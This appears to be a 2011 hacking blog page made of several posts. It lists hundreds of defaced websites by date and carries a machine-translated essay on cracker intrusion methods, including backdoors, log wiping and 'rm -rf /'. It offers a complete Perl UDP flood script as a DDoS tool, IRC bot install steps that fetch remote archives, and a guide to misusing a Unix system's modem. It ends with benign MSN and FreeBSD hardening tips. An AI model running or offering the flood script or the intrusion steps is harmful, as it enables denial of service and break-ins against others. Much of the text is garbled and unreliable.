Site Deface 29 march 2011

www.ssvs.ac.th
www.theislandteacompany.com
bm.hljgszx.com
bm010.com
boss.lzl98.com
buxingjie365.com
che78.com
card.baoanren.com
class.hldnews.com
chway.net
crm.gongrenzhaopin.com
crazyenglishcenter.com
www.festejossanpedro.com
www.findesemanaenasturias.com
daili.shanxiit.com
daogou800.com

disk.hzyhzhx.com
alcasino.info
unicd.com
seotech.info
seedphoto.com
edsv-seal.com
esbright.com
sandsforex.info
lukis.info
casinoduke.com
openorders.net
www.altoservice.co.uk
casinodance.com
bm.51yasi.com
camerabag.uni.cc
axcy88.cn
boatcrewjobs.info
affstore.com
asfzl.net
freesource-area.com
baidiy.com
6008765.com
asthatour.com
b16creativestudio.com
5ixh.com
shanghai.gufeiyong.com
secure.firstcallcomputing.com
www.11jm.com
autoqingdao.com
baikeshow.baikejob.com
www3.office-sp.co.jp
bbs.6639111.com
815885.com
baby9999.com
www.kolonpipe.com
www.mu17173.com
8248.net
88362222.com
www.plasticaitalia.it
www.mo5.cn
www.momaxx-trading-gmbh.de
208ok.com
3a3g.com
30wx.com
365ss.net
htjys.com
tasse.b-meindl.de
www.maddog.gr
www.dpa.com.ve
27118.com
27dm.com
www.tzshjxx.com
www.tzdcw.cn
asjtfw.com
art.gkabc.com
www.syxhzx.com
www.sjms.cc
trade.justtrade.in
mytel070.co.kr
www.airedale-gp-training.co.uk
www.beton.hu
emis.christian.ac.th
hdsqjy.tjhd.gov.cn
www.kartex.com.hk
www.ktvmv.com
www.365health.co.nz
siggesc.isegi.unl.pt
www.hnktz.com
tw.baskr.com
app.earthsearch.us
sts.ntue.edu.tw
www.lehmann-pr.cn
www.lichangzhu.com
my.scqiche.net
tp.tourispac.ch
0478e.com
www.elssme.com
0515sydn.com
www.becker.com.au
www.wsrcw.net
www.asetra.es
wap.aiyag.com
ad.aiyag.com
da.montes.upm.es
www.intechnetworks.es
www.lautianlu.com.tw
7777517.com
aqcdc.org
3woods.com
isose.org
ssynms.com
quickpopo.com
qinyuan8.com
www.bakeryzone.co.kr
sys.avtion.com
anmiso.com
qb.823.ss.la
www.823.ss.la
www.zednews.co.uk
you-inspire.co.uk
murgie.co.uk
frenchhouse.dailymail.co.uk
www.dzslyy.com
bd.enter6mall.com
www.dailymailoffers.co.uk
www.dgma.co.uk
lj.179dj.cn
sy.xuyiwy.com
www.jiujiuw.com
www.xuyizj.com
creif.montes.upm.es
www.operasurgery.co.kr
www.olv06.com
www.yanglao99.com
www.yanglao99.com
www.psdp-egypt.info
d2gods.com
www.valeriasa.com.br
www.shockit.ro
dunia-malaysia.page4.me
grupovelser.com
www.ccim.com.br
www.multimuebles.cl
publiprotege.com
www.losarijogjatour.com
www.hotelmurahjogja.com
sanprimasejati.com
innotechwireless.com
royalguardindonesia.com
www.zipskin-laptop.com
viewmycreation.co.cc
m.joyagps.com
joyagps.com
kvikselv.dk
corporatedaycare.co.in
infoprompt.net
sds.co.in
eisjasper.com
www.datasa.co.za
www.campusvirtuales.com.ar
hms.hebtu.edu.cn
www.lafrance-cafe.com.tw
acalstar.com
superbolao.lancenet.com.br
stihl.rental2k.it
www.es168.cn
www.sergiog.com.br
soledinverno.com
www.daiwa-dvr.jp
www.sergiog.com.br
soledinverno.com
www.daiwa-dvr.jp
www.neurologiarj.com.br
www.szthong.com
www.abreal.co.za
www.xalawyer.net
ecoricambi.com
ly-qc.com
www.shuzifun.com
www.jjcrj.com.cn
www.ahyijia.com
gpa.tmk.ac.th
tcc.e-bestis.com.tw
www.yqkmn.com
www.qasoft.com.cn
www.jindr.cn
sjzasd.com
www.dybr168.com
www.cncautomation.ca
www.zjtiger.com
huangxinxin.com
xm.newedu.org
www.klkxin.com
www.zxly.gov.cn
www.aditusnet.com
www.j-ride.com
lzsx.sclz.net.cn
fodony.com
ifix.freshcode.co.za
hejiahuanhotel.com
habitatstoreonline.com
hr.newedu.org
ruidososchools.org
www.df-lighting.com
hr.newedu.org
ruidososchools.org
www.df-lighting.com
www.chz114.com
jiayouwa.com
ncehome.913173.com
www.913173.com
www.china-consumer.net
xcjx.pyedu.cn
bendavidsalons.com
www.keshet.org.il
longhuong.com
www.jeeptrip.com
shrottweil.com
sqqsxx.pyedu.cn
www.66198198.com
www.snjcy.gov.cn
www.prattkidswrestling.com
www.filearchivos.com
www.soloshotel.com.ar
bha.com.ar
www.bjqxb.com
www.testa.com.ar
jsj.ahiec.net
www.lfdf.net
xsc.ahiec.net
1manbrand.co.uk
www.zfrt.net
member.wealth-mentors.com
bnd.ic-trade.com
www.whitesandstours.ae
dragonit.co.il
www.caferotshild.co.il
www.xfshenghuo.com
www.leaderkx.com
www.xfshenghuo.com
www.leaderkx.com
www.skhlmcmps.edu.hk
www.chinaoristand.com
haishengni.com
www.smkn10-mlg.sch.id
www.rioondeir.com
www.rechonchee.com.br
www.tudodabolsa.eti.br
www.overseadivecenter.com.br
moto.velik.org
www.magalhaesturismo.com.br
www.thedepository.biz
www.jjgas.com.cn
btwyp.com
www.qhdpt.com
www.yingruichem.com
punchaboveyourweight.com
www.astromagus.com
pcfan.com.tw
www.mailscan.nu
pbjchina.com
cnty100.com
ystjy.com.cn
crbbg.com
dalimj.com
vinayakford.com
www.mtt.co.kr
www.ilconsulente.net
www.solutione.com.br
www.glaucomadisease.com
wooam.com
www.dnn.catalystlearning.com
grandsoluxehotel.com
toyota-center.com.cn
toyota-center.com.cn
asp.mos8.com
bx.xsxgxx.com
www.sinpang.com
www.hfis.cn
sjxyz.cn
www.jnxhzdh.com
www.r80rugby.co.nz
www.sonachaandi.us
cs.maifun.com
bj.maifun.com
bbs.tiaofun.com
xfjtmy.com
www.sonachaandi.com
www.kuilongstone.com
www.euicex.com
yxtypx.cn
www.elekter.com
www.willowcrafts.com.cn
www.pixelhk.cn
training.oristand.com
www.bikeb2b.net
qddrjk-fs.com
safety.corna.biz
navecomp.com
agent.dns110.com
bokirestaurant.com
9buys.net
devarkalyanam.com
fashionwoodworks.com
sialn.com
jindugardenhotel.com
oelerfamily.net
w2.kinemo.com
www.kinemo.com

Read More......

Site Deface 28 march 2011

matakin.or.id
www.designers-avenue.com
www.divine-beauty.com
www.duniasprei.com
www.baccini-milano.com
www.tm-trade3000.com
ahlimasjid.com
lindanoviana.info
ies-nn.ru
bakul-tukul.com
gunungkidulkab.go.id
www.tiendanatural.com
www.south-store-watches.com
www.truffe-et-foie-gras.com
www.eramandutyfree.com

perpus.psik-umj.ac.id
www.universitasquality.ac.id
peternakan.gunungkidulkab.go.id
ictkotadepok.net
jurnalfortuna.com
beerenschwester.de
putradcyb3rassassins.blogspot.com
www.1-noveltyphones.com
www.vibrator-bg.com
ratu-collection.com
www.bijouterielanglois.com
www.torreschina.com
www.shirtfast.com
artisanmexico.com
www.pocketcrib.com
puddlejumpersuperstore.com
www.byardllc.com
www.hobbyroad.com
www.mifarmaciasanlorenzo.com
www.buybreak.com
www.besteasystore.com
webskis.com
www.crossbowdeals.com
diceoutlet.com
www.tikiandme.com
comercio.centregar.com
www.razorpit.com
www.fabu-licious.com
www.thedailyplanner.com
www.mebliplus.com
www.repuestosjuanito.com
www.mobilecellphoneaccessories.com
www.efflearn.com
www.inspiredepot.com
www.coscofloor.com
pattaya-web-services.com
www.naughtynightware.com
cjinternetsales.com
sex-shop.si
doodle-wraps.com
louisianahandbook.com
komunitas.coder.web.id
nuditeecovered.com
shoppingduvalstreetkw.com
adoreswimwear.com
www.cabikini.com
www.maxima-sport.pl
www.onlineprescription-pharmacy.com
www.prescription-medicals.com
www.servis-femec.si
negozio.acquaservice.org
www.tdamarant.ru
daniani.web.id
www.corhaven.co.uk
www.crookedimaging.co.uk
www.conquest-games.co.uk
www.thecaninecook.com
www.pccompro.com.ar
whyufirst.com
www.bedcentreuk.co.uk
www.boogylondon.com
antiagingskincareproductreview.com
www.appliancesparesonline.co.uk
opencart.westmontcomputer.com
keltecsub2000.com
stylistbackgrounds.com
mythemecorner.com
www.creative4kids.com
www.centaurguitar.com
www.stieindonesia-ptk.ac.id
loja.okinfo.com.br
rachmatefendi.com
opencart.aicosistemas.cl
www.digitalbazzar.co.uk
www.ies-nn.ru
bakul-tukul.com
www.lindanoviana.info
www.ahlimasjid.com
dean-smith.com
agen-pasar.com
kedaikartika.com
safeindonesia.com
carissa-onlineshop.com
trust-movers.com
www.iesal.web.id

Read More......

Learn To be A Hacker

Hackers with the expertise to see and fix vulnerabilities in computer software;
normally then published openly on the Internet for the system to be better. Unfortunately, few people take the evil use that information to crime - they are usually called a cracker. Basically the world of hackers and crackers are no different from the art world, here we talking art Internet network security.

I hope the science of network security in this paper is used for good things - be a Hacker not a Cracker. Do not until you get karma for using science to destroy property others. Moreover, at present the need for hackers is increasing in Indonesia with dotcommers more who want to IPO in the stock market. Good name and the value of a dotcom could fall even become worthless if the dotcom collapse. In this case, the hackers expected to be a security consultant for the dotcommers it - because the HR party police and security forces in Indonesia is very very weak and pathetic in the field of technology Information & Internet. What may make cybersquad, private cyberpatrol probably need at budayakan for survival dotcommers Indonesia on the Internet.

Various Internet network security techniques can be easily obtained on the Internet, among others, inhttp://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org,
http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Most
of this technique in the form of books that the number of its several hundred pages that can be taken in
free of charge (free). Some Frequently Asked Questions (FAQ) about network security can

obtained in http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. And for
the experimenter some script / program that is so can be found among others in http://bastille-
linux.sourceforge.net /, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
For those readers who wish to gain knowledge about the network can be downloaded free of charge from
http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Some book-shaped
softcopy can be taken free of charge to the capture of http://pandu.dhs.org/Buku-Online/. We must
especially grateful to the team led by Pandu I Made Wiryana for this. At this time,
I do not know of any place of active discussion Indonesia discuss these hacking techniques -
but may be partly discussed in the mailing list information such as kursus-linux@yahoogroups.com
& Linux-admin@linux.or.id which are operated by the Indonesian Linux Users Group (Ltsp)
http://www.kpli.or.id.
The simplest way to see the weakness of the system is by way of seeking information from
various vendors for example in http://www.sans.org/newlook/publications/roadmap.htm # 3b on
weakness of the system they have created yourself. In addition, monitoring the various mailing lists at
Internet which related with security network like in list
http://www.sans.org/newlook/publications/roadmap.htm # 3e.
Described by Front-line Information Security Team, "Techniques Adopted By 'System Crackers'
When Attempting To Break Into Corporate or Sensitive Private Networks, "fist@ns2.co.uk

http://www.ns2.co.uk. A Cracker generally men aged 16-25 years. Based on user statistics
Internet in Indonesia, then in fact the majority of Internet users in Indonesia are children younger
at this age as well. Indeed, this age is the age that is ideal in studying new including
Internet knowledge, very unfortunate if we do not succeed menginternetkan to 25,000 Indonesian school
s / d in 2002 - as the foundation for the future of Indonesia is in the hands of our young kids this.
Well, the young cracker cracking is generally done to improve the ability /
use the resources on the network for its own sake. Generally, the cracker is
opportunistic. Seeing the weakness of the system to carry out the scanner program. After gaining access
root, the cracker will install a back door (backdoor) and close all general weakness
there.
As we know, generally the various companies / dotcommers will use the Internet to (1)
Web hosting their servers, (2) e-mail communication and (3) provide access web / internet to
its employees. Internet and Intranet network separation is generally performed using
engineering / software firewall and proxy server. Seeing the conditions of use of the above, the weakness of the system
generally can penetrate through the mail server for example with external / outside that is used for
easy access to the mail out of the company. In addition, by using aggressive-SNMP
scanner and a program that forced the SNMP community string to convert a router into
bridge (bridge) which can then be used for a stepping stone to get into the network
company's internal (Intranet).
In order for crackers protected during the attack, the technique cloacking (incognito) is done
by jumping from the previous machine has been compromised (conquered) through program
telnet or rsh. At an intermediary machine that uses Windows attack can be performed with
Wingate jumped out of the program. In addition, the jumps can be done through a proxy device
configuration is less good.
After a successful jump and into other systems, usually a cracker to probe against
network and gather the information needed. This is done in several ways,
eg (1) use nslookup to run the command 'ls ', (2) see
HTML file on your web server to identify other machines, (3) to see various documents on
FTP servers, (4) connecting to the mail server and use the command 'expn ', and (5)
her finger users on other external machines.
The next step, the cracker will identify network components that are trusted by the system what
only. These network components are usually the administrator machine and the server that is usually considered
most secure in the network. Start by checking access & NFS exports are critical to various directories
such as / usr / bin, / etc and / home. Exploitation of the machine through the weakness of the Common Gateway Interface (CGI),
with access to the file / etc / hosts.allow.
Next cracker should identify network components that are weak and can be conquered.
Crackers can use the program in Linux like ADMhack, mscan, nmap and many small scanner
other. Programs such as 'ps' and 'netstat' in for a trojan (remember the Trojan horse story? In classical greek story
old) to hide the scanning process. For a fairly advanced cracker can use
aggressive-SNMP scanning to scan equipment with SNMP.
Once the cracker managed to identify the network components are weak and can be conquered, then
cracker will run a program to conquer the weak daemon program on the server. Program
daemon is a program on a server that normally runs in the background (as daemon / demon).


The success of conquering this daemon program will allow a cracker to obtain
access as 'root' (the highest administrator in the server).
To eliminate the trace, a cracker usually perform the cleaning operation 'clean-
up 'operation by way of cleaning the various log files. And add the program to enter
from the back door 'backdooring'. Changing. Rhosts file in / usr / bin for easy access to the machine
that be conquered through rsh & csh.
Furthermore, a cracker can use a machine that has been conquered for their interests
own, such as taking sensitive information that should not be read; mengcracking machine
other by jumping from the machine be conquered; install a sniffer to see / record the various
traffic / communication is passed; can even turn off the system / network by running
command 'rm-rf / &'. The latter will be very fatal consequences because the system will be destroyed at all,
especially if all the software in put in the hard disk. Process re-install the entire system must be done,
would be a headache if it is done on machines that run mission critical.
Therefore all machines & routers that run mission critical should always check
security & on patch by newer software. Backup is very important especially in
machines that perform critical missions in order to be saved from the act of disabling cracker
system with 'rm-rf / &'.
For those of us who wrestle daily on the Internet usually it will greatly appreciate the presence of
hacker (not cracker). Because thanks to the hackers, the Internet is there and can we enjoy such
today, even kept in repair to be a better system. Various weaknesses
system be improved because of cleverness fellow hackers who often times they will be working on improvements.
voluntarily because of his hobby. Moreover, often the result of his hacking distributed free of charge
on the Internet for the purposes of the Internet community. A culture of mutual help values ​​& Noble it grows in cyberspace Internet that usually seem futuristic and far from the social sense.

Read More......

Tools For DDOS website

#!/usr/bin/perl
#####################################################
# udp flood.
#
# www.everydaywith.us
#
#Perl script For Denial Of services
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 \n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - everydaywithus";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

Read More......

hacking wireless with laptop

This video just for knowledge Read More......

Site Deface 26 march 2011

www.skbkotabatam.com
en.sarebangallery.com
www.sifu.my
smkserimahawangsa.edu.my
cbi.messagetarget.com
messagetarget.com
liquidfire.co.za
capitalsense.za.net
andyblog.za.net
www.picturenames.co.uk
www.homebizmedia.com
box2.host1free.com
spirr-itube.com

moltenpros.com
nanovisuals.com
www.dtodhomemarketdelivery.com.au
www.rwcmaine.com
maldo.tv
www.annisaputrirahmanto.com
globalscoutreport.com
iprayla.org
audionetbook.com
indamixx.com
mobiledaw.com
hdmidjs.com
badflo.wen.ru
xrobe.com
vodtv.cc
evidence.za.org
cdewservices.co.za
applegranite.za.net
shaunbartlett.co.za
liquidfire.mobi
skycaster.tv
executiveautocare.za.net
cpf.za.org
fidb.info
citynet.za.net
kurios.tv
dbc.za.org
neolive.za.net
cbi.za.net
grapevineonline.info
rolfrhodes.com
mymindskey.com
ohsosweetdesigns.com
jumpyparty.com
www.pinlabs.unair.ac.id
isaiascenter.com
rohatools.com
www.letempsdesfils.fr
moune54.free.fr
www.timbrecarimbosartesanais.com.br
passarosenaturez.web43.f1.k8.com.br
www.discosdevinilcalcadapaulista.com
transpartsdirect.com
etowahliving.com
nuojieer.com
www.tcoverstock.com
boyimy.com
www.szsdf.com
www.ifmotorsports.com
patesi.com
i-costar.com
loyo-car.com
szusbking.com
phoenixjd.com
zhongaiyis.com
goldensheep1997.com
monster-transmissions.com
allchineseparts.com
www.sunnymotor.com
www.powersportsgalaxy.com
www.wavplanet.com
www.mitrapulsaindonesia.com
payments.gwresources.com
randall-coleman.com
www.theidiomhouse.com.br
www.littleangelcards.co.uk
www.tootsiefootsie.co.uk
villa-boki.de
www.americanspectrum.com
www.kappauns.com.br
holdemfriends.de
www.maozinhasdeanjo.org.br
revolta.star-kom.pl
grupovelser.com
agentur-24.eu
casa-lavanda.com
bizermani.com
www.bigbargainsonline.co.za
hometown.my
shopto.in
kreatvisual.mx
tallyindia.co.in
webshop.incitus.no
meerschaum-pfeifen.com
www.umoja.co.nz
www.akmeneliurojus.lt
vivapens.su
pipexstore.host22.com
www.novitet.dk
kambingonline.net
www.lutashop.com.br
www.hans.com.eg
www.vikon-shardy.hr
kdsoft.de
steakstones.com
www.elracodelesflors.es
www.todoenjoyas.cl
oka.cl
www.ekoaromas.cl
www.sema-online.be
thetimeclockstore.com
www.materiel.ci
mareaelectronica.com.ar
granthamdesigns.com
www.flowershop.az
testspotz1.site90.com
ezshoponline.com
infofisioterapi.com
westerlyhospital.org
bringraph.com.br
mntaxidermy.com
redsandaltours.com
www.employmentbrockville.com
aquacor.com.au
thematrixxpowersuit.com
800pg.co.cc
sitesdeprovence.free.fr
pantai.pusair-pu.go.id
lk.pusair-pu.go.id
rawa.pusair-pu.go.id
irigasi.pusair-pu.go.id
hidrologi.pusair-pu.go.id
hidrologi.pusair-pu.go.id
hathi.pusair-pu.go.id
bhgk.pusair-pu.go.id
web2.pusair-pu.go.id
www.pusair-pu.go.id
www.globaltrucks.hu
www.fushicopperweld.com
www.spitzeleben.de
www.doggies.com.my
www.isbm-school.com
mkspace.biz
www.mitrapulsaindonesia.com
cyber.sman1narmada.sch.id
lab.sman1narmada.sch.id
perpus.sman1narmada.sch.id
doc.sman1narmada.sch.id
media.sman1narmada.sch.id
e-learning.sman1narmada.sch.id
site.sman1narmada.sch.id
jibas.sman1narmada.sch.id
www.sman1narmada.sch.id
www.ikomputer.com
artihidupku.com

Read More......

Chinese Hackers acting

The hackers (hackers) who operate from China allegedly managed to steal information belonging to oil companies and gas from Western countries. The way to break through the

computer network company in question though is equipped with advanced devices.

According to the Associated Press news agency the report was submitted by one of the leading manufacturers of anti-virus, McAfee Inc.., Thursday, February 10, 2011. He did not mention any company that successfully sabotaged Chinese hackers. Oil and gas companies were mentioned only in the United States (U.S.), Taiwan, Greece, and Kazakhstan.

McAfee said that the hacker attacks that began in November 2009. "They identified tools, techniques, and network activities that are used in the attack, which we refer to as 'Dragon Night,' mainly originated in China," according to McAfee.

Method of operating the hackers it is considered not to elaborate. However, they are known to be very patient and have for years allegedly infiltrated in the target computer network.

"It looks like the traditional style, which is paved to steal data," said Josh Shaul, executive security services company computer system from Application Security Inc.. in New York.

Last year, in a joint report from McAfee and Centers Center for Strategic and International Studies in Washington, USA, revealed that more than 300 power plant operators and other infrastructure admit they infiltrated the computer network is unknown.

In general, the motivation of hackers is to squeeze the companies they seek. Oil companies become soft targets because it is believed a very large income.

Read More......

Get free Domain And Free Hosting with Cpanel

you just click banner of above and find the domain to register. If you finished register some domain names (max 2 domain for free ) you can setup and register your hosting here or you can click a banner under this posting.

Read More......

how to install MIRC bot eggdrop and psybnc

I. How to make bot EGGDROP

1. Login your Shell
2. wget http://geocities.com/chibogacrew/azka.tgz
3. tar-zxvf azka.tgz
4. cd. temp
5. . / config nadya nick en ip shell chanel admin porttelnet
example:
. /nadya test arieyanie ccrew 123.01.23.56 chibogacrew samiun 1985
6. ./eggdrop test-m <- config files now live in the waiting on you dalnet channel , if I go bot bot is pv, type the password (type your password) such as a password 456789

II. How to Make Psybnc

1. Login Your Shell
2. wget http://geocities.com/chibogacrew/psy.tar.gz
3. tar-zxvf psy.tar.gz
4. cd. psy
5. . / config 1986 <--- port that can be selected in addition to this I
6. . / fuck
7. . / run

Read More......

Build up your Computer

1. Getting Started

Prepare all components of the computer you will raft, such as casing, mainboard, processor, video card, memory, hard disk, and optical drive (DVD-Rom). Prepare also mur, which is located on the screw in the casing, and also a screwdriver and pliers. Manual motherboard is also required when there is someone you do not understand in the future.

2. Installing the Processor and Memory motherboard

The next step is to install the processor on the mainboard. Open up the processor, remove the processor and equipped with heatsinks with the fan. Processor with a pair considering the 'elbow' of the processor and the socket on the mainboard (slide the cover and lift the first processor socket on the motherboard). Installation must fit between the mainboard with the processor.

After the pair heatsinks with fans on the top of the processor. The pair on the left and right heatsinks. After that 'key' heatsinks that integrates with the motherboard, and will not be easily undone. Do not forget to connect the power cable to the motherboard fan is usually located close to the left or right from the processor socket.

Set the memory (RAM) on the socket is available on the computer. Make sure the position of the slot according to the location of the memory. After fitting the position, press enter and memory that integrates with the motherboard. This will be visible to lock in the left and right will automatically rise to the top, when the memory is installed correctly.

3. motherboard to enter the computer casing

Time you enter into the casing motherboard. If you install the mainboard difficulty or collide with the power supply, you should first dislodged from power supply casing. Set first 'backplate' buffer (which is on the mainboard) on the inside casing. Backplate should be adjusted to the first position mainboard, and the aluminum bolongin who may still be closed from the original factory.

Then attach mur (check first that the position of the location fit the mainboard), which will be a buffer from the mainboard (mur over the form of air, beneath the screw-shaped) in the place provided on the casing. Ensure the right position, and key with pliers. After take motherboard on the top of the mur, and kuncilah with the screw. Make sure mur installed correctly, so that the mainboard when appointed, will not move.

connected choke cable power supply with the mainboard, note that the cable is suitable for the (usually located close to the memory). There are 2 cables that you need to install (if a certain type of computer or type 1 long free cable only).

Then there is the cable that lies at the bottom of the casing, which have about 15 pieces cable. To install, you need to see the manual of your motherboard, or sometimes have information on the motherboard, with the pair to see the position of + and - correctly, and be sure to be wrong.

4. Harddisk and install DVD-ROM/RW

The next step is to install a hard drive in place that have been provided on the inside casing. Usually located in the middle of the bottom of the casing. don't forget to connect the power cable to the hard disk, hard disk and the data cable to the motherboard, then kuncilah with the screw provided. In the video installation disk is still a long hard type that is still using the IDE. If the SATA hard disk is more or less the same, you only need the cable to match only to harddisk.

The step-ROM or DVD RW is also almost the same. You need to first remove the cover that is at the top of the casing. After the DVD-ROM drive installed, do not forget to lock the side of the four DVD-ROM with the screw provided. Do not forget to also connect the cable to the power of DVD-ROM and data cable to the mainboard. And one audio cable that can connect you with a sound card (if any) or the motherboard (if you onboard sound card).

The last step is to install VGA Card (if any). If you onboard VGA with the mainboard, this step can you ignore. VGA slots are usually located in the middle of the mainboard (processor side) with a slot that another color alone. In the video posted is AGP VGA Card, for a new type (PCI-E), is the same way.

Read More......

HOW TO DIAL OUT ON A UNIX SYSTEM

This document makes the assumption that you are currently logged on to the
system and are sitting in a shell environment.
1. First of all we need to locate the L-devices file.
It should be found in the /usr/lib/uucp directory,
but in case it isn't typing:
find / -name L-devices -print
will show you where it is.

If you can't find it then don't worry as we can get
around it, only it will take a bit of trial and error.
2. If you found the L-devices file then we need to list
it by typing:
cat L-devices
If it runs off the screen then type:
cat L-devices | more
This will page the output - space displays the next
page and return will show the next line while q quits.
This file shows us to which serial line (port) the
modems (ACU's) are connected, it also shows when they
can be called and the baud rate.
We are interested in the serial line and the baud rate.
Choose a line with your desired speed and make a note of
the serial line. The speed is shown as 2400,1200,300 etc.
and the serial line as ttynn where nn is a number.
3. If you couldn't find/list the L-devices file then type:
who am i
This will show which serial line you are on, and as you
are on a modem then it's a fair bet that the others are
not too far away. e.g. If you are on line tty07 then
there's a good chance of a modem being on tty06,tty08 or
thereabouts.
4. Now we need to make a direct connection to the modem by
typing:
cu -sbaud -l/dev/ttynn dir
where baud and ttynn are your desired speed and serial
line respectively.
If you couldn't find/list the L-devices file then this is
where the trial and error I told you about comes in.
When you get it right it should come up with 'Connected'.
5. Now we are talking directly to the modem. As a precaution
at this point I suggest saving the modem's current config
by typing:
AT&W
Don't worry if you can't see what you are typing as it is
probably in quiet mode with echo off.
Now restore the factory default settings by typing:
AT&F
Now you can set up the modem as you require it, just as
you would with your own and use it as normal.
When you have finished type:
ATZ
to restore the modem back to it's initial state, then
type:
~.
It should come up 'Disconnected' and you should now be
back in your shell.
-------------------------------
It is probably best to try and log on to a RACE system on an 0800 number
as then it won't cost you a penny to call your favourite BBS's.

Read More......

MSN Messenger

Here is a tip for those of use who or security conscience. msn messenger
keeps a list of all the people who are on the contact list of anyone who
has used msn on your computer. open up regedit or what ever you use I use
nortons version.

step one: navigate to HKEY_CURRENT_USER
Step two: open up software
step three: open up microsoft
Step four: open up MessengerService
Step five: open up ListCache
step six: click on .NET Messenger Service and steer in amazment that all
that info is on your computer and u didn't even know about it
step seven: right click on .NET Messenger Service and press DELETE.
step eight: give yourself a pat on the back

Msn will continue to work as normal and as far as im aware it doesn't
replace the entry.

Note: I have only tested this on WIN98SE as that it's the only OS I havE
access to. if you use something else I suggest exporting the entry before
you delete it just to be sure your safe.

Read More......

TrustedBSD Mandatory Access Control framework

1. Introduction
===============

I've written this tutorial because FreeBSD's handbook
(http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/index.html) didn't offer enough
information on how to correctly/safely install/configure/use MAC on a workstation. Please
refer to the man pages and handbook for detailed explanation on how everything works.

MAC (mandatory access control) is used to introduce system security modules in order to fortify
the default lack of security policies in most unices. This paper discusses the
instalation/configuration and basic use of the following policies:

mac_seeotheruids, mac_bsdextended, mac_ifoff, mac_portacl, mac_test, mac_none, mac_stub
mac_partition, mac_mls, mac_biba, mac_lomac

Compile your kernel with the new policies by adding the following line in the kernel conf. file:
options MAC


2. Simple policies
==================

These policies work without the use of the labelling feature:

A. mac_seeotheruids (man mac_seeotheruids)

$ ps ax |wc -l
90
# kldload mac_seeotheruids
# sysctl security.mac.seeotheruids.enabled=1
^^^ this is the default behaviour (use sysctl.conf to make permanent changes)
$ ps ax | wc -l
30

You can exempt a groupd ID from the policy:

$ id -G
2000
$ ps ax | wc -l
30
# sysctl security.mac.seeotheruids.specificgid_enabled=1
# sysctl security.mac.seeotheruids.specificgid=2000
$ id -G
2000
$ ps ax | wc -l
90

Or even let users see their primary groups processes: (remember to set seeotheruids.specificgid_enabled to 0)

# sysctl security.mac.seeotheruids.primarygroup_enabled=1
$ id -G
2000
# ps ax | wc -l
35
(my 30 processes + 5 others owned by the same group)

B. mac_bsdextended

Ever used ipfw ? This is fsfw (file system firewall).

# kldload mac_bsdextended
# ugidfw list
0 slots, 0 rules

# cat rc.mac_bsdextended
#!/bin/sh
i=0
while [ ${i} -le 4 ]
do
ugidfw remove ${i}
i=`expr ${i} + 1`
done
ugidfw set 0 subject uid new object uid root mode rsx
ugidfw set 1 subject uid new object gid wheel mode rsx
# yes, /bin/ls works now
ugidfw set 2 subject uid new object uid bugghy mode n
ugidfw set 3 subject uid new object gid bugghy mode n
# owned by bugghy == private :)
ugidfw set 4 subject uid new object gid nobody mode n
# new can't "locate | grep /home/bugghy" anymore <-- BIG security risk
# you can deny other groups (from /etc/group) or users (/etc/passwd)

$ id -u -nr
bugghy
$ echo sex > /tmp/bug; chmod a+rwx /tmp/bug; ls -l /tmp/bug
-rwxrwxrwx 1 bugghy wheel 4 Apr 5 20:05 bug*

$ id -u -nr
new
$ ls -l /home
ls: bugghy: Permission denied
total 4
drwxr-xr-x 2 new new 512 Mar 28 15:09 new
$ ls /tmp/bug
ls: /tmp/bug: Permission denied

C. mac_ifoff

# kldload mac_ifoff
$ ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.203 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.203/0.203/0.203/0.000 ms
# sysctl security.mac.ifoff.lo_enabled=0
$ ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

# sysctl security.mac.ifoff.other_enabled=1
^^^ we enable external interface (which is disabled by default)
You can write a script that runs aide (with a proper config file) and if it finds modified
files in the protected directories it won't allow external network traffic.
# sysctl security.mac.ifoff.bpfrecv_enabled=1
^^^ allows Berkeley Packet Filter traffic (man 4 bpf)

D. mac_portacl
To enable mac policies on sockets "sysctl security.mac.enforce_socket=1": (default value)

# kldload mac_portacl

# sysctl net.inet.ip.portrange.reservedlow=0
sysctl net.inet.ip.portrange.reservedlow: 0 -> 0
# sysctl net.inet.ip.portrange.reservedhigh=1000
sysctl net.inet.ip.portrange.reservedhigh: 1023 -> 1000
# sysctl security.mac.portacl.port_high=1010
security.mac.portacl.port_high: 1000 -> 1010

# sysctl security.mac.portacl.suser_exempt=0
^^^ rules apply for root too

$ id -u
2000
$ nc -l -p 1000
Can't grab 0.0.0.0:1000 with bind : Operation not permitted
^^^ the ip.portrange.reservedhigh limit works
$ nc -l -p 1010
Can't grab 0.0.0.0:1010 with bind : Operation not permitted
^^^ the mac.portacl.port_high limit works too

# sysctl security.mac.portacl.rules=uid:2000:tcp:1000,uid:2000:tcp:1010
^^^ we enforce 2 rules (the first tries to bypass ip.portrange.reservedhigh
and the 2nd tries to bypass mac.portacl.port_high)

